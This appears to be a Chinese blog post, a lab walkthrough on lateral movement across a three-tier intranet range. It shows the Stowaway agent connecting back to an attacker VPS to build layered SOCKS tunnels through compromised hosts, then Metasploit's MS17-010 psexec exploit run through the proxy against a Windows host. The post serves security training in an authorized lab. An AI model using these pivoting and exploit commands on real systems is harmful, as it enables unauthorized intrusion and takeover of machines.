当前位置: 首页 > news >正文

内网横向靶场——记录一次横向渗透(三)

今天是这个靶场的最后一篇工具使用了,这次的工具比前两篇文章的更加稳定以及方便;当然,主要还是以工具的使用以及思路为主;

文章目录

    • 免责声明
      • 靶场演示免责声明
      • 核心使用规范
      • 免责说明
    • 靶场简介
      • 内网结构
    • 第一层代理
      • 服务端操作(VPS或者kali)
      • 客户端操作(192.168.22.11主机)
      • 横向操作:
      • 图片概括:
    • 搭建第二层代理
      • 服务端
      • 客户端
      • 攻击步骤:
      • 图片概括:
    • 总结


免责声明

靶场演示免责声明

本靶场演示环境仅为网络安全技术学习、研究及技能实践专用,旨在提升使用者的网络安全认知与技术应用能力。

核心使用规范

  1. 使用者承诺仅在本靶场授权范围内进行操作,不得利用靶场环境及相关技术攻击、入侵、破坏任何第三方的计算机系统、网络设备或数据资源。
  2. 严禁将靶场所学技术用于违反《网络安全法》《刑法》等法律法规的非法活动,不得侵犯他人合法的网络权益与数据隐私。
  3. 所有操作均需在合法合规、获得明确授权的前提下进行,使用者独立对自身操作行为及可能产生的后果承担全部责任。

免责说明

  1. 靶场搭建方、维护方仅提供学习演示环境,不参与、不指导任何非法操作,对使用者超出授权范围的违规行为及衍生后果不承担任何法律责任。
  2. 因使用者违规使用靶场技术或环境导致的法律纠纷、经济损失、行政处罚等一切后果,均由使用者自行承担,与靶场相关方无关。
  3. 本声明自使用者访问或使用靶场环境之日起生效,如有未尽事宜,均依据国家相关法律法规执行。

本篇文章请大家以网络安全技术学习为目的观看,仅用于知识研究与技能实践,严禁将相关内容用于任何违法违规活动,所有操作需在合法授权范围内进行,使用者自行承担违规后果。


靶场简介

内网结构

本次实验靶场采用多层级内网渗透模型,典型配置包含三个递进式靶机(Target1、Target2、Target3),通过虚拟网络隔离形成企业级内网架构

  • 基础层(Target1-Centos7)
    • 部署 Web 服务(如 ThinkPHP 框架),开放 80、22 等常见端口,存在Web 漏洞。
    • 两个网卡:(用于连接内外网,充当中间服务器的作用)连接外网,作为渗透入口,需通过漏洞获取初始权限。
    • 外网网段,如 192.168.44.0/24;内网网段:192.168.22.0/24
  • 中间层(Target2-Ubuntu)
    • 位于内网(VMnet2 网段,如 192.168.22.0/24),需通过 Target1 作为跳板机横向移动。
      可能存在权限提升漏洞(如 CVE-2021-4034)或服务弱口令,需进一步渗透。
    • 外网机器(44网段的主机)无法直接访问到这台机器;
  • 核心层(Target3-Windows)
    • 处于更深层内网(VMnet3 网段,如 192.168.33.0/24),通常为 Windows 系统,开放 445 端口,可利用永恒之蓝(MS17-010)等漏洞攻击。

具体结构显示:
在这里插入图片描述

信息收集部分这里就不赘述了,主要是讲解不同工具的使用以及思路;详细请看这篇文章:内网横向靶场—记录一次横向操作(手把手详细思路教学)

好了话不多说,我们直接开始;


第一层代理

所需工具:

  • 一台VPS(阿里云,腾讯云,京东云等,随便买一台即可)
    • 如果没有VPS,也可以用kali代替,没关系的
  • stowaway内网横向工具
    • 包含stowaway客户端),stowaway(服务端)
      在这里插入图片描述
  • 蚁剑

服务端操作(VPS或者kali)

首先将stowaway上传到VPS(或者你的kali) —(用来运行服务端):

然后指定我们监听的端口:9999

# 执行命令
./admin -l 9999 -s hack

在这里插入图片描述

新开一个窗口,查看端口是否成功监听:

在这里插入图片描述

客户端操作(192.168.22.11主机)

这里我们通过ThinkPHP框架的RCE漏洞,也是成功用蚁剑连接上了,所以我们将本次使用的工具stowaway上传到/tmp目录下:

在这里插入图片描述

通过蚁剑将stowaway上传到192.168.22.11主机上(用来运行客户端,来建立socks代理);

# 命令执行
chmod +x agent
./agent -c VPS地址:9999 -s hack

在这里插入图片描述
执行命令;

此时,服务端有了反应:

在这里插入图片描述

然后我们直接在服务端,输入socks 1081开启VPS的端口,进行隧道的搭建:

在这里插入图片描述

横向操作:

然后我们再用浏览器的插件去配置相应的服务,从而成功访问192.168.22.22搭建的Web页面:

在这里插入图片描述

也是成功访问:

在这里插入图片描述

图片概括:

在这里插入图片描述

第一层代理操作的关系如上图;


搭建第二层代理

接下来我们要做的就是访问192.168.33.0/24这个内网网段了;

服务端

在服务端:进入node 0节点,执行listen,设置监听端口7000,开启监听模式:

# 执行命令
use 0
listen
1
7000

在这里插入图片描述

客户端

在Target1上可以看到agent监听了7000端口:

在这里插入图片描述

然后我们又经过了一系列操作(具体看这一篇文章),进入到了192.168.22.22的蚁剑(需要新打开一个蚁剑窗口):

在Target2中连接Target1的7000端口(相当于VPS和22主机中间搭了一座桥,11主机作为中间人负责联系)

这里我们需要打开蚁剑的代理设置才能连接到22主机:

在这里插入图片描述

然后上传工具:

在这里插入图片描述

进入目录,输入命令:

在这里插入图片描述

执行命令:

chmod +x agent
./agent -c 192.168.22.11:7000 -s hack

此时服务端:

在这里插入图片描述

进入到node 1后,我们同样的可以去建立一个socks代理:

socks 1082

在这里插入图片描述

查看是否正确建立监听:

在这里插入图片描述
(处于监听状态)

攻击步骤:

然后打开kali,通过msf进行攻击:

使用命令如下:

msfconsole
use exploit/windows/smb/ms17_010_psexecset payload windows/meterpreter/bind_tcp
set proxies socks5:117.x.x.x:1082
# setg proxies socks5:117.x.x.x:1082
set rhosts 192.168.33.33exploit 

在这里插入图片描述

成功拿到权限:

在这里插入图片描述

至此,渗透攻击结束;

图片概括:

在这里插入图片描述

第二层代理操作的关系如上图;

总结

没有总结,期待下次再见~

http://www.dtcms.com/a/598364.html

相关文章:

  • 兰州电商平台网站建设设备外观设计效果图
  • 【XR开发系列】Unity下载与安装详细教程(UnityHub、Unity)
  • 深度学习——参数优化
  • 网站排名优化外包公司有限公司怎么纳税
  • Simulink 基础模块使用
  • 叫人做网站多少钱怎么根据视频链接找到网址
  • [论文阅读] 生成式人工智能嵌入对公众职业安全感冲击的影响机理及防范对策
  • 双桥区网站制作页面升访请广大狼
  • 余弦退火策略
  • Linux 网络:邻居子系统
  • 招聘网站开发成本揭阳网站设计公司
  • 网站建设三网合一指的是什么意思军队营房基础建设网站
  • Python教学基础:用Python和openpyxl结合Word模板域写入数据-由Deepseek产生
  • 保姆级CHARLS数据库使用教程
  • 光辉网站建设公司河南郑州建设网站
  • 如何使用 Gitblit 内置的 GitLFS 存储大文件
  • 网站开发公司 商业计划书信息流投放平台
  • [论文阅读] 软件工程 | 解决Java项目痛点:DepUpdater如何平衡依赖升级的“快”与“稳”
  • 建设一个网站需要多少钱青岛做网站eoe
  • 在数据“可用不可见”中寻找支付安全与体验的平衡
  • 男人女人做那个网站wordpress中文翻译插件
  • 东莞长安营销型网站建设宁夏百度公司
  • 网站开发课程论文北京最近发布会直播
  • 网站页面设计效果图设计专业招聘信息
  • 没有网站可以做百度排名吗1688网站建设与维护
  • pink老师html5+css3day08
  • 上海企业网站制作公司wordpress 网站统计
  • 网站追踪如何做网站制作哪家大
  • nginx介绍与简单操作
  • 个人制作的网站做废铝的关注哪个网站好